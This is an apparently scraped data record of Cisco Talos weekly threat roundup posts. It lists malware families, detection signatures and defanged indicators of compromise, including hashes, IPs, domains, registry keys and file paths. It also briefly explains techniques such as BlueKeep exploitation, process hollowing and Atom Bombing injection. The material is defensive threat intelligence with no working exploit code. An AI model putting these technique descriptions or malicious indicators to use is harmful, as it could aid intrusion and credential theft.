cb73396e304937a404c63ad696c6e2d269f38d8082d636e2c16e550f1f7cb118 cd8b407e19e2d93dfc939cd04e3a43100d2442128f42c226ac1dedeba0da4824 d2377ff809d7d65898523f10b38331edf20c11547776894343e926f6bddf1e39 d6e35e20d5b7fa3d0b5352b4953701cabb4ed2a83d94dc666ef9900b7c53394a d851e224dd46fbf74960d57bf29f8b60157e9b697e5132d5e97abe504f6038a2 d9ddfa571587bd55c75526b8f17e6dbbb8a4b6179bfc002575cdcbf446154e7a fd1e8a916fa218df73894c59784dc94cbd26c7c7a5e1c1ee37ce45b349e4cc2c `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-ZnBq2sVehBU/XkbmO3anDII/AAAAAAAADT0/wj80al3dA3Ajcuw_6SUUQGjAbQBgazCKwCLcBGAsYHQ/s1600/d851e224dd46fbf74960d57bf29f8b60157e9b697e5132d5e97abe504f6038a2_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-Dcj1XBW55ao/XkbmSCbeXFI/AAAAAAAADT8/pnsmYG6HaCEaZmf3NOYrkEwtxv19k74ngCLcBGAsYHQ/s1600/d851e224dd46fbf74960d57bf29f8b60157e9b697e5132d5e97abe504f6038a2_tg.png>)\n\n \n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/-ex3DbvgX5Ow/XkbmWdet0wI/AAAAAAAADUA/_sFoL3ZJzrMq-GDxOkYCpFiKfjXbT52XgCLcBGAsYHQ/s1600/d2377ff809d7d65898523f10b38331edf20c11547776894343e926f6bddf1e39_umbrella.png>)\n\n \n\n\n#### Malware\n\n[](<https://1.bp.blogspot.com/-jLsjhr0_epY/Xkbmb2rgrAI/AAAAAAAADUE/klXR0xSE4z0KByVybr4Jm2WbNY_XVV7RQCLcBGAsYHQ/s1600/0670326e0572ca61e6a1f9b654088f5ac91fd3426dcba932377c801763fe5906_malware.png>)\n\n \n\n\n \n\n\n* * *\n\n## Exploit Prevention\n\nCisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps users defend endpoints from memory attacks commonly used by obfuscated malware and exploits. These exploits use certain features to bypass typical anti-virus software, but were blocked by AMP thanks to its advanced scanning capabilities, even protecting against zero-day vulnerabilities. \nCVE-2019-0708 detected \\- (4662) \n--- \nAn attempt to exploit CVE-2019-0708 has been detected. The vulnerability, dubbed BlueKeep, is a heap memory corruption which can be triggered by sending a specially crafted Remote Desktop Protocol (RDP) request. Since this vulnerability can be triggered without authentication and allows remote code execution, it can be used by worms to spread automatically without human interaction. \nExcessively long PowerShell command detected \\- (749) \nA PowerShell command with a very long command line argument that may indicate an obfuscated script has been detected. PowerShell is an extensible Windows scripting language present on all versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell based threats. \nKovter injection detected \\- (319) \nA process was injected into, most likely by an existing Kovter infection. Kovter is a click fraud Trojan that can also act as an information stealer. Kovter is also file-less malware meaning the malicious DLL is stored inside Windows registry and injected directly into memory using PowerShell. It can detect and report the usage of monitoring software such as wireshark and sandboxes to its C2. It spreads through malicious advertising and spam campaigns. \nProcess hollowing detected \\- (206) \nProcess hollowing is a technique used by some programs to avoid static analysis. In typical usage, a process is started and its obfuscated or encrypted contents are unpacked into memory. The parent then manually sets up the first stages of launching a child process, but before launching it, the memory is cleared and filled in with the memory from the parent instead. \nGamarue malware detected \\- (188) \nGamarue is a family of malware that can download files and steal information from an infected system. Worm variants of the Gamarue family may spread by infecting USB drives or portable hard disks that have been plugged into a compromised system. \nAtom Bombing code injection technique detected \\- (133) \nA process created a suspicious Atom, which is indicative of a known process injection technique called Atom Bombing. Atoms are Windows identifiers that associate a string with a 16-bit integer. These Atoms are accessible across processes when placed in the global Atom table. Malware exploits this by placing shell code as a global Atom, then accessing it through an Asynchronous Process Call (APC). A target process runs the APC function, which loads and runs the shellcode. The malware family Dridex is known to use Atom Bombing, but other threats may leverage it as well. \nInstallcore adware detected \\- (105) \nInstall core is an installer which bundles legitimate applications with offers for additional third-party applications that may be unwanted. The unwanted applications are often adware that display advertising in the form of popups or by injecting into browsers and adding or altering advertisements on webpages. Adware is known to sometimes download and install malware. \nDealply adware detected \\- (75) \nDealPly is adware, which claims to improve your online shopping experience. It is often bundled into other legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements on webpages. Adware has also been known to download and install malware. \nReverse http payload detected \\- (30) \nAn exploit payload intended to connect back to an attacker controlled host using http has been detected. \nCorebot malware detected \\- (20) \nCorebot is a Trojan with many capabilities found in other prominent families. It features a plugin system to enable it to load a variety of features from the C&C server at any time. Known plugins include RAT capabilities such as taking desktop screenshots, as well as being able to intercept and modify browser communications and steal data, especially data related to banking. \n \n", "cvss3": {}, "published": "2020-02-14T11:35:23", "type": "talosblog", "title": "Threat Roundup for February 7 to February 14", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2019-0708"], "modified": "2020-02-14T11:35:23", "id": "TALOSBLOG:E339E76DD9CC8BF6BC7108066B44196A", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/3m6HBreCgdU/threat-roundup-0207-0214.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-24T21:27:12", "description": "[](<https://1.bp.blogspot.com/-YY2FQl9WGXA/XURYSq-inGI/AAAAAAAAACc/Ko8Q3jzMHrs2tIOdnt-yO6QVWhNtZBrPwCLcBGAs/s1600/recurring%2Bblog%2Bimages_threat%2Broundup.jpg>)\n\nToday, Talos is publishing a glimpse into the most prevalent threats we've observed between Jan. 17 and Jan. 24. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats. \n \nAs a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net. \n \n \nFor each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found [here](<https://alln-extcloud-storage.cisco.com/blogs/1/2020/01/tru.json_.txt>)that includes the complete list of file hashes, as well as all other IOCs from this post. As always, please remember that all IOCs contained in this document are indicators, and one single IOC does not indicated maliciousness. \nThe most prevalent threats highlighted in this roundup are: \n \nThreat Name | Type | Description \n---|---|--- \nWin.Packed.TrickBot-7541396-1 | Packed | Trickbot is a banking trojan targeting sensitive information for certain financial institutions. This malware is frequently distributed through malicious spam campaigns. Many of these campaigns rely on downloaders for distribution, such as VB scripts. \nWin.Dropper.Qakbot-7541405-1 | Dropper | Qakbot, aka Qbot, has been around since at least 2008. Qbot primarily targets sensitive information like banking credentials but can also steal FTP credentials and spread across a network using SMB. \nWin.Packed.Nymaim-7542552-1 | Packed | Nymaim is malware that can be used to deliver ransomware and other malicious payloads. It uses a domain generation algorithm to generate potential command and control (C2) domains to connect to additional payloads. \nWin.Malware.Azorult-7541464-1 | Malware | Azorult is a banking trojan that attempts to steal credit card data and other sensitive information to facilitate cybercrime. \nDoc.Malware.Emotet-7544675-1 | Malware | Emotet is one of the most widely distributed and active malware families today. It is a highly modular threat that can deliver a wide variety of payloads. Emotet is commonly delivered via Microsoft Office documents with macros, sent as attachments on malicious emails. \nWin.Worm.Vobfus-7541859-0 | Worm | Vobfus is a worm that copies itself to external drives and attempts to gain automatic code execution via autorun.inf files. It also modifies the registry so that it will launch when the system is booted. Once installed, it attempts to download follow-on malware from its command and control (C2) servers. \nWin.Trojan.XpertRAT-7550253-1 | Trojan | XpertRAT is a remote access trojan that provides an attacker with the ability to access an infected machine remotely and has the ability to steal sensitive information like usernames and passwords. XpertRAT has been around since 2011 and consists of a core component and multiple modules, all written in Delphi. \nWin.Trojan.Upatre-7549404-0 | Trojan | Upatre is a malicious downloader often used by exploit kits and phishing campaigns. Upatre downloads and executes malicious executables, such as banking malware. \nWin.Packed.Passwordstealera-7544289-0 | Packed | This malware has the ability to harvest stored credentials, keystrokes, screenshots, network activity, and more from computers where the software is installed. \n \n* * *\n\n## Threat Breakdown\n\n### Win.Packed.TrickBot-7541396-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\AUTHROOT\\CERTIFICATES\\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 \nValue Name: Blob ` | 7 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\PROFILELIST\\S-1-5-21-2580483871-590521980-3826313501-500 \nValue Name: RefCount ` | 2 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\AUTHROOT\\CERTIFICATES\\75E0ABB6138512271C04F85FDDDE38E4B7242EFE \nValue Name: Blob ` | 1 \nMutexes | Occurrences \n---|--- \n`Global\\316D1C7871E10` | 40 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`95[.]181[.]198[.]151` | 24 \n`79[.]174[.]12[.]245` | 22 \n`195[.]123[.]240[.]81` | 16 \n`185[.]62[.]188[.]83` | 12 \n`181[.]140[.]173[.]186` | 10 \n`5[.]182[.]210[.]109` | 10 \n`185[.]99[.]2[.]149` | 10 \n`85[.]143[.]219[.]230` | 10 \n`23[.]95[.]231[.]187` | 10 \n`176[.]119[.]159[.]204` | 9 \n`198[.]23[.]209[.]201` | 8 \n`5[.]2[.]76[.]122` | 8 \n`146[.]185[.]219[.]31` | 8 \n`198[.]8[.]91[.]10` | 6 \n`92[.]63[.]105[.]138` | 6 \n`5[.]182[.]211[.]44` | 6 \n`164[.]68[.]120[.]60` | 5 \n`181[.]129[.]104[.]139` | 4 \n`51[.]89[.]73[.]159` | 4 \n`216[.]239[.]38[.]21` | 3 \n`181[.]113[.]28[.]146` | 3 \n`176[.]58[.]123[.]25` | 2 \n`116[.]203[.]16[.]95` | 2 \n`52[.]44[.]169[.]135` | 2 \n`52[.]55[.]255[.]113` | 2 \n \n*See JSON for more IOCs\n\nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`teene[.]site` | 6 \n`checkip[.]amazonaws[.]com` | 4 \n`api[.]ipify[.]org` | 3 \n`ipinfo[.]io` | 3 \n`ident[.]me` | 2 \n`ip[.]anysrc[.]net` | 2 \n`api[.]ip[.]sb` | 2 \n`ipecho[.]net` | 2 \n`2cdajlnnwxfylth4[.]onion` | 2 \n`www[.]myexternalip[.]com` | 1 \n`250[.]5[.]55[.]69[.]zen[.]spamhaus[.]org` | 1 \n`myexternalip[.]com` | 1 \n`icanhazip[.]com` | 1 \n`wtfismyip[.]com` | 1 \nFiles and or directories created | Occurrences \n---|--- \n`%System32%\\Tasks\\Task Gpu health` | 40 \n`%TEMP%\\<random, matching '[a-f0-9]{3,5}'>_appcompat.txt` | 40 \n`%TEMP%\\<random, matching '[A-F0-9]{4,5}'>.dmp` | 40 \n`None` | 39 \n`%APPDATA%\\DirectTools\\data` | 25 \n`%APPDATA%\\DirectTools\\settings.ini` | 25 \n`%APPDATA%\\gpuhealth` | 15 \n`%APPDATA%\\gpuhealth\\data` | 15 \n`%APPDATA%\\gpuhealth\\settings.ini` | 15 \n`%APPDATA%\\DirectTools\\Data\\pwgrab64` | 2 \n`%APPDATA%\\DirectTools\\data\\pwgrab64_configs\\dpost` | 2 \n`%APPDATA%\\DirectTools\\data\\pwgrab64_configs` | 1 \n \n#### File Hashes\n\n` 0143ebd2f87acf44bf4b8dc9f03ba00e7eff4d2a723e93bfb7c628a83b993f9a 06951826498d418e5f0ca33112d2cb607d738e9ccb08feaa1ce3427bffa22600 06fce1e6e9c3187d9cf087c6fe4034785f1ffaccbe9b500e424dcc03946a83da 0a1a547185e396fa877b82e7cbc716fe682a95588914944246f0b18c8828bf8f 0addc7b9d5e37d663277cdc9c15fa001ed5db6fa59263a5869b5aed99180ef02 0e4b9cea532791a825d4774d95580827667bff1e75f83b936d0e5cc3ab7236e6 16a0f1a7a0fe7277e4ef69b214b48a0c7f6a96fee6c78bf979b92fb97aed3c83 1f42082ee2954a70c60d15886366307ccacbb8080f03daa536e3fae361a46f4d 20ec1ae9bf3e33e2321f10cb230cc543792b94ecfaf358847b6b85e6d03af17f 297e4bd8eb28b69336a5d05abefd50985f7f5161c1bb08dd54a287a85123f856 2a1494652183e00b35e5566123fa3a2b3d73f9ac8a686258b4905a47a5354488 30b023cc4b072dfdef48929f92bbf283d112a92d03698b58b4c4fea402912c82 31ef497ec1ba5f2a858c92732416cff7bc1a1cdfaddef2ec539b09bbf9e83369 34610185ae8d7ccb60c2c536a2a1ed17be1b4741d2f88206f874276309b439ac 364252d2f0111a2d1bb24aaae430f57ae07c6209682b3567d5c99bbc73a2ce26 3826b709fd3add9b91d37828209ca8b8c05aa60ca2c34d82be1f4260b8188f83 38b5cf64a8cb8099d5c24d82ddd981f00941126c53b999906ddab7b4eff05b11 3c4bf379d34de653845d1efc59eb441388e99aa7e72137b5964d74467d58013f 3e206f84c4467a51a246ada113646b8dd79aebec8b2ecbd515434335db48f6f0 4172720904201256e209df95026384a4a46c1cd5f7910aa7d309633b747e37da 45a2a54c9228d8aef0ef8599c21b2b51bb4163aa02982a205c2fee36c9ffd5e3 47e90d2bd50809df1e9b1b8bc97883dbfa277a760914179cc8f8e54b58290852 4d13f83b56a619c0c34d5fa2fd1c3376ed3c3b837d626599983be29a0e31cc00 4d3eb4806824008f979eae543f41cc90e1e7dd47d95b70bb98984454974d0865 52e86752e9af7aec9c31ea3f3bb224ad02966c11bf7ef73e0eeaf4c247fd2a51 `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA |  \n \n#### Screenshots of Detection\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-IXC1NLLbMZI/XitNDG_iMSI/AAAAAAAADKU/EiPEs5oggmAuNSLeWX7POoNbaThxoGVfQCLcBGAsYHQ/s1600/45a2a54c9228d8aef0ef8599c21b2b51bb4163aa02982a205c2fee36c9ffd5e3_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Dropper.Qakbot-7541405-1\n\n#### Indicators of Compromise\n\nMutexes | Occurrences \n---|--- \n`ocmwn` | 22 \nFiles and or directories created | Occurrences \n---|--- \n`%TEMP%\\<random, matching '[a-f0-9]{3,5}'>_appcompat.txt` | 22 \n`%TEMP%\\<random, matching '[A-F0-9]{4,5}'>.dmp` | 22 \n`\\TEMP\\437d5b4d9e4c5d8ab4615871f9e7830c.exe` | 1 \n`\\TEMP\\385ece7d547122fba5d712c7495a6721.exe` | 1 \n`\\TEMP\\c09a343a545e0f9e36444a847e3ad5ac.exe` | 1 \n`\\TEMP\\c78811efdd2612e5ca25249df2cf7600.exe` | 1 \n \n#### File Hashes\n\n` 0aea1de8b679fe547239de586664d4693f8cc6cef89340b3fb161c09630f6b14 1118a488e6f39981fb9b24b1bbf3dcd9c0bde2ca79353ad231427a96e951340e 15a4c8dc1980650038b2e8823807746cadb6f106737719e8e8c14b3fcea0b8d4 1e24651cd82da5234ef6dc48f67ea123889fab0dcfe9d41c9d9e4aaba7016786 1ea2902b3b1245d195b86c48a72ea70591877f99beeb622c20bb8ec672ce2daf 298c9f7d8fb46cbf8d3d59a9b145ebbc1c27cb507e4290cd37f02e6754225ddf 2a389b7f20979df29d32ecbcfb0c290891aea90d483f29f95617c2b06dc72670 3617f78b320d1e2efa260579b7d7df9beb37fc47c4bb7d5f320d7675f18894ed 3754ca2f4e3057827092577b1385fde7f07a53f12c6ddc3d6fd5f0f9d6a1239c 457b9bd110b9ada83477e9e1b578663cc3fa5e9d8d0eea8eb41bca51ed11fe09 4c1c055f423adc3d2eed4a54602bf607ccf2562f498aca8b1f1e7e23e1054373 6e2382936ba75dc342bec4ddee3bfc1f3a608f9dfaf3146c9a23d6e3551d6e3f 8e01ab60655a87bdc2a3b56bdc84a50e1c4079555218f28ff6fdc6e1ac109e92 a73e870268c6baa9b6c1f646b7b56d96655b0e2af784be9b5de3dd618c0e8fde bec8eb12798277e788ee835a6da3873fac69a68fb9796d2f248b9b3162285869 c0a8971ffec59c7987826d4ba03fbe539263b92f90718dbdabf6cc382531e417 c78e50570a2d04460be294f5bf5626d03b21c177aa0271e0597baea65caaa2b2 ca0e1deff6b8bcdb9bd5a170529339c6582e78deaa5153db86098fe65664f7e2 cd64755ab2a51aeeefe9afb202ddc84b7f04570271f27630eaf8ea76811937a0 d119ff32920eb407b85a23c825b67454444c0b5097deae743ab8f774f5416d28 d1c307f7b14523f3fa68fbbe0c41b39c40c3a8a27db996d4b952cb7fc183a42b dd722366c1a992ad2e014c2eacb856e76f7677acee045ed552ae3b2ee05e2e99 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA | N/A \n \n#### Screenshots of Detection\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-OnRG3SfoiaQ/XitNpWbndWI/AAAAAAAADKc/1kb4rDsyk74XvBr8Br7qV3AOijLiL1TMgCLcBGAsYHQ/s1600/15a4c8dc1980650038b2e8823807746cadb6f106737719e8e8c14b3fcea0b8d4_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Packed.Nymaim-7542552-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\MICROSOFT\\GOCFK ` | 15 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\GOCFK \nValue Name: mbijg ` | 15 \nMutexes | Occurrences \n---|--- \n`Local\\{369514D7-C789-5986-2D19-AB81D1DD3BA1}` | 15 \n`Local\\{D0BDC0D1-57A4-C2CF-6C93-0085B58FFA2A}` | 15 \n`Local\\{F04311D2-A565-19AE-AB73-281BA7FE97B5}` | 15 \n`Local\\{F6F578C7-92FE-B7B1-40CF-049F3710A368}` | 15 \n`Local\\{306BA354-8414-ABA3-77E9-7A7F347C71F4}` | 15 \n`Local\\{F58B5142-BC49-9662-B172-EA3D10CAA47A}` | 15 \n`Local\\{C170B740-57D9-9B0B-7A4E-7D6ABFCDE15D}` | 15 \n`Local\\{888E04DB-EDDB-D2EC-5F32-1719D74FA2E0}` | 15 \n`Local\\{D876A547-0EDD-4A55-0873-9F0D6D3719FB}` | 15 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`fzncuowwstw[.]pw` | 15 \n`wawrgrtjcdr[.]com` | 15 \n`ochirxt[.]net` | 15 \n`klcbberl[.]com` | 15 \n`fxcskhwr[.]in` | 15 \n`vpbcco[.]net` | 15 \n`mrbhs[.]pw` | 15 \n`wiztdyzp[.]com` | 15 \n`eqbrnmigl[.]in` | 15 \n`csuaibcneix[.]net` | 15 \n`lnulxvsvvl[.]pw` | 15 \n`szthbpsn[.]pw` | 15 \n`nokuznpxbypo[.]com` | 15 \n`tthzpuipne[.]pw` | 15 \n`juxrdizkivk[.]net` | 15 \n`hcjihn[.]in` | 1 \n`omcbnlos[.]net` | 1 \n`voxrdn[.]net` | 1 \n`zbztpauc[.]pw` | 1 \n`caojbfvum[.]net` | 1 \n`dkzexx[.]net` | 1 \n`npdcqoxaepfz[.]net` | 1 \n`ljhafrwlf[.]in` | 1 \n`vauordi[.]com` | 1 \n`bfeqxicrqaxp[.]pw` | 1 \n \n*See JSON for more IOCs\n\nFiles and or directories created | Occurrences \n---|--- \n`%ProgramData%\\ph` | 15 \n`%ProgramData%\\ph\\fktiipx.ftf` | 15 \n`%TEMP%\\gocf.ksv` | 15 \n`%ProgramData%\\<random, matching '[a-z0-9]{3,7}'>` | 15 \n`%APPDATA%\\<random, matching '[a-z0-9]{3,7}'>` | 15 \n`%LOCALAPPDATA%\\<random, matching '[a-z0-9]{3,7}'>` | 15 \n`%TEMP%\\fro.dfx` | 12 \n`\\Documents and Settings\\All Users\\pxs\\pil.ohu` | 12 \n`%TEMP%\\bpnb.skg` | 1 \n`%TEMP%\\haqhxh.vsz` | 1 \n`\\Documents and Settings\\All Users\\po\\vikog.axh` | 1 \n \n#### File Hashes\n\n` 13faed74357cf5f5a66983ce864e49d8ab3d16dc0c4c04a95888fe6ff2580b5c 1e22dbdfbcafcef6e91099b7c345a52a4f59a92fe1f8d30e333bce0d92b7c850 2c22e368525024b26e7c7d1058260093a2f380373010e6e387bea75e325c613c 36799b98d45008973435f10c8e1ba40288b92d6199e4ecec16e40e918e44d58d 3f9a8d0d084d4640a73140faf01df696531c0a6d762309655c503718b412a081 4a70f8df27631b3f76c1a6d520aa53983484e442dd79155d20101fae271e98c5 63fe06736f3fe6ef3ae4c58c89cebc9f055872cab247a707490e3c4b41ca8ff7 9938f7621ae034d3b677c1dbebeb29fe57e1e8a275856aa404d2bca260c808a4 a315a6e21350c5a9811f5006b78ffc5906e5f0c2fc1ed31af8bfc7e056f12797 a66e66ef119cb1451ba006a49417432bc8700f096adff827d4ae7bf0dae07a67 acebcce1368e7a969746cae53715768a37620dc2cfd278f4cff2b891c0d9af6c c43573752804b8f215c95dcb4ab87985cfc87010bfe459e9ab836c8dacb86f5c ccd4a7ded8fa23a750dc9437399cdc6f84964fc0fe4106b2df67ad558014b9e9 e0e5fb674a45c8d4515294b2b591860679993da4a2c48f656f206fa874a5cb98 fd65221380cfca194a1dbd9351357ee2fd0c132784385ed1ff3141c5b19a6805 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA | N/A \n \n#### Screenshots of Detection\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-X26IWZcqkOs/XitOawbQKHI/AAAAAAAADKk/bwxFxGMmOGMqpgc9tAWQNoXQgOWk5MYZQCLcBGAsYHQ/s1600/9938f7621ae034d3b677c1dbebeb29fe57e1e8a275856aa404d2bca260c808a4_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Malware.Azorult-7541464-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\PICTURE ` | 20 \n`<HKCU>\\SOFTWARE\\PICTURE\\PICTUREPROCESSINGTOOLSV1.0 ` | 20 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER \nValue Name: GlobalAssocChangedCounter ` | 10 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\UNINSTALL\\WOTSUPER 2.1 ` | 10 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\UNINSTALL\\WOTSUPER 2.1 \nValue Name: DisplayName ` | 10 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\UNINSTALL\\WOTSUPER 2.1 \nValue Name: DisplayVersion ` | 10 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\UNINSTALL\\WOTSUPER 2.1 \nValue Name: VersionMajor ` | 10 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\UNINSTALL\\WOTSUPER 2.1 \nValue Name: VersionMinor ` | 10 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\UNINSTALL\\WOTSUPER 2.1 \nValue Name: Publisher ` | 10 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\UNINSTALL\\WOTSUPER 2.1 \nValue Name: DisplayIcon ` | 10 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\UNINSTALL\\WOTSUPER 2.1 \nValue Name: UninstallString ` | 10 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\UNINSTALL\\WOTSUPER 2.1 \nValue Name: URLInfoAbout ` | 10 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\UNINSTALL\\WOTSUPER 2.1 \nValue Name: HelpLink ` | 10 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\UNINSTALL\\WOTSUPER 2.1 \nValue Name: InstallLocation ` | 10 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\UNINSTALL\\WOTSUPER 2.1 \nValue Name: InstallSource ` | 10 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\UNINSTALL\\WOTSUPER 2.1 \nValue Name: Language ` | 10 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\UNINSTALL\\WOTSUPER 2.1 \nValue Name: NoModify ` | 10 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\UNINSTALL\\WOTSUPER 2.1 \nValue Name: NoRepair ` | 10 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\UNINSTALL\\WOTSUPER 2.1 \nValue Name: InstallDate ` | 10 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\UNINSTALL\\WOTSUPER 2.1 \nValue Name: EstimatedSize ` | 10 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\BYTEDOWNLOAD PROTECT SERVICE ` | 9 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\BYTEDOWNLOAD PROTECT SERVICE \nValue Name: Type ` | 9 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\BYTEDOWNLOAD PROTECT SERVICE \nValue Name: Start ` | 9 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\BYTEDOWNLOAD PROTECT SERVICE \nValue Name: ErrorControl ` | 9 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\BYTEDOWNLOAD PROTECT SERVICE \nValue Name: DisplayName ` | 9 \nMutexes | Occurrences \n---|--- \n`d19ab989-a35f-4710-83df-7b2db7efe7c5{846ee340-7039-11de-9d20-806e6f6e6963}` | 10 \n`A16467FA7-343A2EC6-F2351354-B9A74ACF-1DC8406A` | 10 \n`Global\\<random guid>` | 10 \n`01B1CA98-EE2E-41B3-8A2F-F319643109E5` | 2 \n`None` | 1 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`216[.]83[.]52[.]40` | 20 \n`103[.]91[.]210[.]187` | 11 \n`45[.]139[.]236[.]14` | 10 \n`23[.]106[.]124[.]148` | 10 \n`45[.]76[.]18[.]39` | 9 \n`37[.]140[.]192[.]153` | 9 \n`104[.]27[.]185[.]71` | 7 \n`185[.]99[.]133[.]121` | 6 \n`37[.]140[.]192[.]166` | 6 \n`88[.]99[.]66[.]31` | 5 \n`13[.]107[.]21[.]200` | 4 \n`93[.]190[.]142[.]79` | 3 \n`208[.]95[.]112[.]1` | 3 \n`209[.]141[.]34[.]150` | 3 \n`216[.]83[.]52[.]19` | 3 \n`104[.]27[.]184[.]71` | 3 \n`183[.]131[.]207[.]66` | 2 \n`216[.]83[.]52[.]20` | 2 \n`204[.]79[.]197[.]200` | 1 \n`220[.]243[.]236[.]20` | 1 \n`220[.]242[.]158[.]12` | 1 \n`104[.]28[.]10[.]3` | 1 \n`204[.]188[.]226[.]98` | 1 \n`104[.]27[.]171[.]106` | 1 \n`194[.]36[.]188[.]13` | 1 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`iplogger[.]org` | 10 \n`silvergeoa[.]com` | 10 \n`area[.]cyp360[.]com` | 10 \n`installsilver[.]com` | 9 \n`confirmssystems[.]com` | 9 \n`passwordkernel[.]online` | 9 \n`123321123[.]fun` | 6 \n`scp46[.]hosting[.]reg[.]ru` | 4 \n`ip-api[.]com` | 3 \n`myprintscreen[.]com` | 3 \n`fbinstall[.]cyp360[.]com` | 3 \n`ok` | 2 \n`js[.]users[.]51[.]la` | 2 \n`ia[.]51[.]la` | 2 \n`budison-oklarly[.]com` | 2 \n`ac[.]681776[.]com` | 2 \n`yip[.]su` | 1 \n`megagemes[.]info` | 1 \n`termscenter[.]com` | 1 \n`cleand8yv0m6g[.]top` | 1 \n`newbook-t[.]info` | 1 \nFiles and or directories created | Occurrences \n---|--- \n`\\TEMP\\d` | 20 \n`\\TEMP\\d-shm` | 20 \n`\\TEMP\\d-wal` | 20 